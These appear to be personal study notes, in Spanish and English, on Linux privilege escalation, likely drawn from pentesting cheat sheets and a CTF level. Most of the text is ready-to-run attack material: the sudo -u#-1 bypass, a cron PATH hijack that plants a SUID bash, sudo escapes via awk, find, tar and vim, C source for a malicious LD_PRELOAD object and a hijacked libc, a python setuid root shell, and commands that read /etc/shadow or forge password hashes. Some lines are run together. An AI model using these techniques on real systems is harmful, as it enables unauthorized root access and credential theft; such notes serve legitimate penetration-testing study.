Apuntes
ESCALADA DE PRIVILEGIOS
Informacion del sistema
(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null
echo $path
variables de entorno
(env || set) 2>/dev/null
Kernel exploit
cat /proc/version
uname -a
searchsploit "Linux Kernel"
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
Dirty Cow exploit CVE-2016-5195 (DirtyCow)
Sudo version
searchsploit sudo
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
sudo <= v1.28
sudo -u#-1 /bin/bash
Procesos
ps aux
ps -ef
top -n 1
Tareas Cron basadas en tiempo
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
Ejemplo
Cron path
For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
(Note how the user "user" has writing privileges over /home/user)
If inside this crontab the root user tries to execute some command or script without setting the path. For example: * * * * root overwrite.sh
Then, you can get a root shell by using:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
- Wait cron job to be executed/tmp/bash -p
- The effective uid and gid to be set to the real uid and gid
Servicios
time.service
systemctl show-environment
Listar servicios ejecutados
systemctl list-timers --all
Si tienen permisos de escritura podemos modificarlo para ejecutar comandos
Si puedes modificar un temporizador puedes hacer que ejecute alguna unidad systemd.existente (como un .service o un .target)
Unit=backdoor.service
activar un temporizador
sudo systemctl enable backu2.timer
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
Enumeracion de red
- Hostname, hosts and DNS
cat /etc/hostname /etc/hosts /etc/resolv.conf
dnsdomainname
- Content of /etc/inetd.conf & /etc/xinetd.conf
cat /etc/inetd.conf /etc/xinetd.conf
- Interfaces
cat /etc/networks
(ifconfig || ip a)
- Neighbours
(arp -e || arp -a)
(route || ip n)
- Iptables rules
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)
- Files used by network services
lsof -i
Puertos abiertos
(netstat -punta || ss --ntpu)
(netstat -punta || ss --ntpu) | grep "127.0"
Escanear toda la red
timeout 1 tcpdump
Enumeracion de usuarios
- Info about me
id || (whoami && groups) 2>/dev/null
- List all users
cat /etc/passwd | cut -d: -f1
- List users with console
cat /etc/passwd | grep "sh$"
- List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
- Currently logged users
w
- Login history
last | tail
- Last log of each user
lastlog
- List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
- Current user PGP keys
gpg --list-keys 2>/dev/null
busqueda de archivos con permisos SUID
- este permiso tiene la capacidad de ejecutar el binario como el propietario
sudo -l
- Comprueba que comandos se pueden ejecutar con sudo
find / -perm -4000 2>/dev/null
- Buscar todos los binarios con permisos SUID
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
sudo tar c a.tar -I ./runme.sh a
ftp>!/bin/sh
less>! <shell_comand>
Sudo -l NOPASSWD
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
ejecutando sudo y el archivo podemos acceder como el propietario
sudo vim -c '!sh'
y tendremos una bonita shell
LD_PRELOAD
LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.
To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
If you find inside the output of sudo -l the sentence: env_keep+=LD_PRELOAD and you can call some command with sudo, you can escalate privileges.
Defaults env_keep += LD_PRELOAD
Save as /tmp/pe.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}Then compile it using:
cd /tmp/gcc -fPIC -shared -o pe.so pe.c -nostartfiles
Finally, escalate privileges running
sudo LD_PRELOAD=pe.so <COMMAND> #Use any command you can run with sudo
Capabilities
este comando es para listar las capabilities
getcap -r / 2>/dev/null
para añadir una capabilities
setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep
- Exploit
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
Sesiones de screen
screen -ls
attach to session
screen -dr <session> #The -d is to detacche whoever is attached to it
screen -dr 3350.foo #In the example of the image
Listar sesiones de Tmux
tmux ls
ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess
Busqueda de passwords en el etc/passwd y en el etc/shadow
- Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
- Shadow equivalent files
cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null
Busqueda de hashes
grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
crear password para añadir en el etc/shadow
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Shared Library
ldconfig
Identify shared libraries with ldd
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
Create a library in /tmp and activate the path.
gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
RPATH
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flag15]
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)
By copying the lib into /var/tmp/flag15/ it will be used by the program in this place as specified in the RPATH variable.
level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)
Then create an evil library in /var/tmp with gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6
#include<stdlib.h>
#define SHELL "/bin/sh"
int __libc_start_main(int (*main) (int, char , char ), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}
[Caido - A lightweight web security auditing toolkit](https://caido.io/)